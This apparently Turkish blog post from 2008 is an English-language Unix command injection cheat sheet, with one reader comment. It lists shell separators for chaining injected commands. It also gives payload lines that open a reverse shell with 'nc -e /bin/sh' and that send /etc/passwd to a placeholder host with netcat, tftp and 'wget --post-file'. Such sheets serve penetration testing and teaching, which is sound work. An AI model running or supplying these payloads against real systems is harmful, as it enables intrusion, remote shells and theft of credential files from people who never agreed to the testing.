Menüyü Gizle

Unix Command Injection Cheat Sheet

Etiketler english, unix, comman injection, web application security, guvenlik, exploit, cheat sheet, 20.07.2008

Short, yet quite useful command injection cheat sheet.

Executing Commands

  • Seperating Commands:
    blah;blah2
  • PIPE:
    blah | blah2
  • PIPEZ:
    blah ^ blah2
  • AND:
    blah && blah2
  • OR:
    FAIL || X
  • OR:
    blah%0Dblah2%0Dblah3
  • Backtick:
    `blah`
  • Background:
    `blah & blah2`

Getting Files / Data

  • FTP:
    Make a new text, and echo and then redirect to FTP
  • NC:
    nc -e /bin/sh
  • NC:
    echo /etc/passwd  | nc host port
  • TFTP:
    echo put /etc/passwd | tftp host
  • WGET:
    wget --post-file /etc/passwd

Credits : notsosecure and pentestmonkey

Yorum Ekle Yorumunu Ekle - Yazıcı Versiyonu Yazıcı Versiyonu - Yorumlar için RSS Yorumlar için RSS
anahtar kelimeler : cheat sheet exploit guvenlik web application security comman injection unix english

Gehinnom - 31.07.2008

Güzel bilgiler tesekkürler. Üzerinde çalistigim kontrol paneli projesinde kullanabilecegim seyler var.

Yorum Yazın


Tüm yorumlar onaydan geçmektedir, bu işlem en uzun 30 dk. sürecektir. E-mail adresleri yeni yorumları bildirme harici hiç bir başka amaçla kullanılmamaktadır ve sitede gözükmemektedir.

Yeni yorumlardan haberdar et

Captcha Kodu